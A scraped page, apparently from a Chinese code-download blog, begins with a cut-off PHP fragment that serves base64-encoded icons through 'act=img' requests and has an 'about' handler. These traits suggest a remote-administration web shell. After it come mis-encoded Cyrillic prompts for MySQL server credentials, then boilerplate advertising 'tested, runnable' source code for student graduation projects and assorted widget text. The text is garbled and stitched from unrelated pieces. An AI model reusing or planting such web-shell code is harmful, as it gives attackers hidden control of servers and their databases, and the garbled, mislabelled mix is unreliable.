header("Cache-control: max-age=".(60*60*24*7));

header("Last-Modified: ".date("r",filemtime(__FILE__)));

foreach($imgequals as $k=>$v)

{

if (in_array($img,$v)) {$img = $k;}

}

if (empty($arrimg[$img])) {$img = "small_unk";}

if (in_array($img,$ext_tar)) {$img = "ext_tar";}

echo base64_decode($arrimg[$img]);

}

else

{

echo "

";

$k = array_keys($arrimg);

foreach ($k as $u)

{

echo $u.":%5C%22%22.%24surl.%22act=img&img=%22.%24u.%22%5C%22
";

}

echo "

";

}

exit;

}

if ($act == "about")

{

$dàta = "Any stupid copyrights and copylefts";

echo $data;

}

$microtime = round(getmicrotime()-$starttime,4);

?>

Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!

Àäðåñ ñåðâåðà:
Íàçâàíèå áàçû:
Ëîãèí:
Ïàðîëü
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值